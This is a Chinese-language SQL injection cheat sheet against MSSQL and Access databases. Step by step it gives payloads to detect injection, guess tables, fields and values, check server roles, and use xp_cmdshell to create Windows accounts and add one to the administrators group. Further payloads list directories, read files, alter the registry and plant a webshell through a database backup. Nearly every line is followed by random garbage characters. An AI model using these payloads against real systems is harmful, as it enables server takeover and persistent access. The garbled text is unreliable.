1.判断是否有注入;and 1=1 ;and 1=2 +|<bb8�%��
2.初步判断是否是mssql ;and user>0 G&Yo2aADR�
]
fA5D)/m<
3.注入参数是字符'and [查询条件] and ''=' a�WvC-vZ�k
zLxuxf~4@�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' [�P6A�$HC<
BTO��l`��U
5.判断数据库系统 �l�R
F5�/�
+wHa)A0�MW
;and (select count(*) from sysobjects)>0 mssql bF;|0X$
x�
4�v(?]�]�X
;and (select count(*) from msysobjects)>0 access a~!7A
ZT-O
M�u.o���qT
9�)[�)0�7
.W�9�
*�-
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��P�� u��Q
)�-�iUUa�k
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 5�,O:"3>c�
Z�Oppec�1D
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9�qz��Hy}A
�A;�^{%S
9.(1)猜字段的ascii值(access) _ Fk^lDI-�
�F7=\��*U�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "*�c�&[ALw
VY|�U�B7,C
(2)猜字段的ascii值(mssql)
D4@(_��6^
1x��sJz^%V
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ?}uvp��B1}
P�;X0L{u0H
10.测试权限结构(mssql) P $r�!�u%W
g�<w1d{T�d
`USze0"t0:
Q2m 5&yy@s
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �W=#jtU`:5
E�3x<o<v��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- :a=]<�_*x�
Ir�-
1@_1Q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- sP9{t��k2K
.��7Pp'-hK
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- DU5rB\!.~�
^|!\Iz�Dp�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �pJ�o4&�Ff
hO$�29_^"�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �,�d
H�AD�
"�HJQAy?W
;and 1=(select IS_MEMBER('db_owner'));-- �0G'v4Vj0'
s�AK&^�g�
�dJ�b7�d`�
��l{kacfk#
11.添加mssql和系统的帐户 i4�SW�Fa``
M%!j\��}2A
;exec master.dbo.sp_addlogin username;-- �mkg�L/h*�
;exec master.dbo.sp_password null,username,password;-- )R�@Y$*�fm
'Rv.6>xq�c
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Lk)T�K/JM)
Uy�M����lk
;exec master.dbo.xp_cmdshell 'net user username password tg�~7^��(s
k$,y1hH;f8
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 1u*
�(=!�
�L_=3`xE
_
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �v1�NFz>Hx
�g�rDz7\i:
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �E�n8L�1$_
hg `���N`O
NL"w#kTc()
��(Q�|Y*yI
12.(1)遍历目录 od3�b,��Q�
$�b�k_%R}s
;create table dirs(paths varchar(100), id int) +�C4�NhA2�
r+��MqjdXG
;insert dirs exec master.dbo.xp_dirtree 'c:\' _<)�HFg��6
L%.=S�b�mS
;and (select top 1 paths from dirs)>0 ZZ]�.h2=�K
wY7����+E/
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) W�jBt�L�52
*jy"�g64j�
�8WG�_4�e
T"Nnl(�cO_
(2)遍历目录 /5�:�qS\Zl
6�c�[ L*1
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �bB.Yq3KI�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �leJ3-w{ 2
jT�o���k1k
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 I#CS;Y�h95
p,2H�8I){
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 z�vbz3��a�
M`@�Es#�s�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 No��w�2ad&
��V}���t8H
�2!Pwg0�%2
d%ncI��0f`
13.mssql中的存储过程 5{��M$m&$1
�+�hMF\��@
xp_regenumvalues 注册表根键, 子键 �KRj3�?�?b
r�j;~SC�{�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 wafws*b%��
1.�z !u%�2
xp_regread 根键,子键,键值名 VD2o#.7*eu
(�7}Zh|�@W
;exec xp_regread ���9B1bq�#
@|�Hx�>|p�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ��X0%B�E�!
���<�h1�J+
xp_regwrite 根键,子键, 值名, 值类型, 值 J y0T�V�jA
[[8��h*�[:
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 |>=\
VX17�
3-�
4jS�N\
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ZvW&�%*k=�
1�s#GY<<�
xp_regdeletevalue 根键,子键,值名 0,[�-���4m
8oj�-�5|ct
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �K�9y!Z�oB
:�i6k6��=�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 21Bl����Lz
88y�dAx#P
^L<*g���gw
�6ui�j�xia
14.mssql的backup创建webshell �5Y&s+�| �
�
}[<eg>9#
use model �VoJelyz�h
<��IBz��h_
create table cmd(str image); ��9GZKT{�*
[af<FQ�{��
insert into cmd(str) values (''); e�mV@k�N.�
#?z��1cgCg
backup database model to disk='c:\l.asp'; yv<�0f��Q�
,SAS\�!hsE
q#�RVi8('
0���F<O� \
15.mssql内置函数 .�#;;�pu7W
I/s�?��]�v
;and (select @@version)>0 获得Windows的版本号 �66%#$WH�#
��%�L�./U$
;and user_name()='dbo' 判断当前系统的连接用户是不是sa N+?���kFob
.Wq`�q�F(;
;and (select user_name())>0 爆当前系统的连接用户 S�`"M;%�T�
8fd�K|�l w
;and (select db_name())>0 得到当前连接的数据库 V����\kf6E
�d%�9r"=/
2�f]9�I�1{
�|Js96>B�:
16.简洁的webshell *4���^!e/�
'P�lKCn`(w
use model xnu�|?;.}!
#TUsi�,�jG
create table cmd(str image); Uc�}L/�ax�
dox�QS ohS
insert into cmd(str) values (''); }�d�)�>p�H
+�g�OCl*L�
backup database model to disk='g:\wwwtest\l.asp';
